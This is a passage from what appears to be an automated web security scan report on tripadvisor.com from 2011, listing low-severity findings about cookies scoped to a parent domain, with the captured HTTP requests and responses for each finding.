Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; TACds=C.2.11007.0.2011-10-02

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:04 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:02:04 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.6*MC.11893*LS.CheckMore_SmartDeals*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.94*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.4139280*LD.258705*EWS.CheckMore; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 16671
Connection: close
Content-Type: text/html;charset=UTF-8

<div id="CHECK_MORE_SITES_LB" class="checking_rates">
<dl class="property zoom_wrap">
<dt class="heading">
You're checking rates on: </dt>
<dd class="details zoom_wrap">
<img class="thumbnail" src="ht
...[SNIP]...

13.22. http://www.tripadvisor.com/Commerce

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /Commerce

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Commerce?p=Expedia&src=32623573&geo=258705&matchID=1&from=HotelDateSearch_SmartDeals&area=QC_Inline&slot=1&cnt=6&oos=4&silo=910&bucket=1739&ttype=Hotel&inMonth=10%202011&inDay=14&outMonth=10%202011&outDay=16&adults=NaN&pid=4799 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TACds=C.2.11007.0.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.4*MC.11893*LS.HotelCheckRates*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.0*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; ServerPool=T

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 01:01:57 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:01:57 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.5*MC.11893*LS.HotelCheckRates*PD-2332.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.6*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: PCT=%7B%22p-2332%22%3A1%7D; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Location: http://www.expedia.com/pubspec/scripts/eap.asp?GOTO=HotAvail&HotID=894999&InDate=10/14/11&OutDate=10/16/11&NumAdult=2&NumChild=0&eapid=21187-1&ICMCID=TRIPA.Expedia_US-H_B4.11893.T&ICMDTL=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html;charset=UTF-8


13.23. http://www.tripadvisor.com/HotelCheckRates

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /HotelCheckRates

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /HotelCheckRates?Action=AddBoomerangTag HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
Content-Length: 55
Origin: http://www.tripadvisor.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; TACds=C.2.11007.0.2011-10-02

checkIn=10%2F14%2F2011&checkOut=10%2F16%2F2011&adults=2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:05 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:02:05 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.7*MC.11893*LS.HotelCheckRates*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.25*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.4139281*LD.258705*EWS.CheckMore; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/html;charset=UTF-8

<!--check rates-->

13.24. http://www.tripadvisor.com/SmartDeals-g1-m11893

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /SmartDeals-g1-m11893

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SmartDeals-g1-m11893?&q=bos&checkin=10/9/2011&checkout=10/16/2011&adults=1 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TACds=A.1.11539.1.2011-10-02

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:37:46 GMT
Server: Apache
Set-Cookie: TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:37:46 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.50*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*FS.37*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=%1%a_checkin.10%2F9%2F2011-qbos-a_adults.1-m11893-a_checkout.10%2F16%2F2011; Domain=.tripadvisor.com; Expires=Mon, 10-Oct-2011 00:37:46 GMT; Path=/
Location: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=utf-8


13.25. http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TACds=A.1.11539.1.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.1*MC.11893*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*TRA.true; ServerPool=T; PassThruUrlArgs=%1%a_checkin.10%2F9%2F2011-qbos-a_adults.1-m11893-a_checkout.10%2F16%2F2011; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:38:20 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AC.DFW*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:21 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.58*MC.13091*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals%5C.html*FS.37*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:21 GMT; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 356474
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="content-type" content="text/html
...[SNIP]...

13.26. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e5.0-13878-5.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/img2/ratings/partner/e5.0-13878-5.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/img2/ratings/partner/e5.0-13878-5.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TACds=C.2.11007.0.2011-10-02; TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.5*MC.11893*LS.HotelCheckRates*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.58*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; PCT=%7B%22p-2147%22%3A1%7D; ServerPool=T

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:16 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.6*MC.11893*LS.HotelCheckRates*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.expedia%5C.com%2FBoston-Hotels-Hotel-Commonwealth%5C.h894999%5C.Hotel-Information%3Ficmdtl%3DMT1110027Z3xeMPeET6itK0Qu1f-JQAAU%5C.894999%5C.HDSSDeE%5C.T%5C.QCI%5C.258705%5C.ch%5C.668%5C.60745%5C.en_US%5C.%5C.%3Fchkin%3D10%2F14%2F11%3FhashTag%3DroomsAndRates%3Fchkout%3D10%2F16%2F11%3Feapid%3D21187-1%3Frm1%3Da2%3F*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: TACds=C.3.13878.5.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 01:02:16 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 2673

GIF89aC..............t......rtrd.N...z.g),*.................p...n.Y[.Edd].........CEC.......\j............]T7.............................RUU.......... 4............STOC=).tL.....].....T..A...X.B....
...[SNIP]...

13.27. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/3.0-11539-1.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/img2/ratings/traveler/3.0-11539-1.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/img2/ratings/traveler/3.0-11539-1.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:28:31 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.CA5B1B8B5844B487705CCB63281E5A9D*SQ.1*MC.11539*GR.52*TBR.4*EXEX.78*ABTR.50*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*FP.CDSimp*RP.http%3A%2F%2Fwww%5C.hotelplanner%5C.com%2FHotel%2FHotelRoomTypes%5C.cfm%3FhotelID%3D113791%26inDate%3D10%2F04%2F11%26outDate%3D10%2F07%2F11%26NumRooms%3D1%26hrnQuoteKey%3Dc6d7ef83-2fb9-429a-9916-19c05c46dbab*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:28:31 GMT; Path=/
Set-Cookie: TACds=A.1.11539.1.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 00:28:31 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 1285

GIF89av....:............q......m.Z.....n000...@@@...w.f...............w.e```......ppp.....}............ ..}PPP.......!.YL)we7..<3......`.r>hX0.....g...........S..L......b.NX.B...................
...[SNIP]...

13.28. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/img2/ratings/traveler/4.0-11539-1.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/img2/ratings/traveler/4.0-11539-1.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:28:31 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
